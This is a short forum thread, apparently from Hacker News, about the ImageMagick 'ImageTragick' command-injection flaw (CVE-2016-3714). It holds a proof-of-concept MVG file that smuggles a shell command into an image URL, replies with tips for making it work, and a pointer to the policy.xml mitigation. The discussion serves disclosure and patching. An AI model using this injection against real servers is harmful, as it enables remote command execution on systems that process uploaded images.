3 ms·
PoC: save as file.mvg and then run convert file.mvg o.png viewbox 0 0 1 1 image over 0,0 0,0 'https://test/" https://test/" && touch /tmp/hacked && echo "1'
by lobbybobby 10y ago
PoC: save as file.mvg and then run convert file.mvg o.png
viewbox 0 0 1 1
image over 0,0 0,0 'https://test/" https://test/" && touch /tmp/hacked && echo "1'
- dpritchett 10y agoThis is what I get on an unpatched staging server. Not sure it did anything... $ sudo convert file.mvg o.png convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065. convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ > error/blob.c/OpenBlob/2638. convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.
- benmmurphy 10y agoif https://test https://test can't be opened by curl then the rest of the commands will fail because they are chained by &&. if you change the first && to || then it will work.
- 0x0 10y agoI assumed that "bug" was added intentionally as a script kiddie deterrence...
- dpritchett 10y agoCan confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.
- 0x0 10y agoWorks for me (with a slight bugfix to the .mvg) :O The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714 https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
- mathias 10y agoReplace `test` with `example.com` et voila.
- deleted 10y ago[deleted]
- lucraft 10y agoYou can trigger the code execution by just using "less" on the mvg file, as it uses ImageMagick if it's installed :)